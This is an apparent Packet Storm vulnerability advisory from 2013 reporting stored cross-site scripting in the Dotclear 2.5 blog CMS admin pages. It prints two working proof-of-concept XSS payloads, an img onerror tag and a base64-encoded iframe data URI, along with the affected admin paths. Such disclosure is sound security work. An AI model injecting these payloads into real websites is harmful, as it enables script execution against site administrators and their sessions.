Dotclear 2.5 Cross Site Scripting

2013-06-04T00:00:00
ID PACKETSTORM:121882
Type packetstorm
Reporter Nikhalesh Singh Bhadoria
Modified 2013-06-04T00:00:00

Description

                                        
                                            `Exploit Title: Dotclear 2.5 Cms Cross Site Scripting Vulnerabilities  
# Date: 06/04/2013  
# Author: Nikhalesh Singh Bhadoria  
# Twitter: @nikhaleshsingh  
#Download Link:http://dotclear.org/  
# Versions Affected: Dotclear 2.5.  
# Category:Xss  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
Vulnerabilitie Description:  
  
The Vulnerabilities in admin area users options and many other place input in is not sanitized. Therefore it results  
in a stored cross-site scripting  
  
Dotclear Description:  
DotClear was design only for weblogs management, and do it well. It is completely free! DotClear is a free software distributed under the GNU General Public License..  
  
POC:  
http://www.youtube.com/watch?v=3eiEC8MtrpM&feature=youtu.be  
  
Code :-  
########################################################################################################  
"><img src=x onerror=prompt(0);>  
  
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">  
  
http://demo.xxx.com/admin/preferences.php  
http://demo.xxx.com/dotclear/admin/users.php  
  
##########################################################################################################  
Fix:  
Better sanitization by restricting special characters.  
  
Regard's  
Nikhalesh Singh Bhadoria  
Information Security Enthusiast  
Website:Gurunsb.com  
`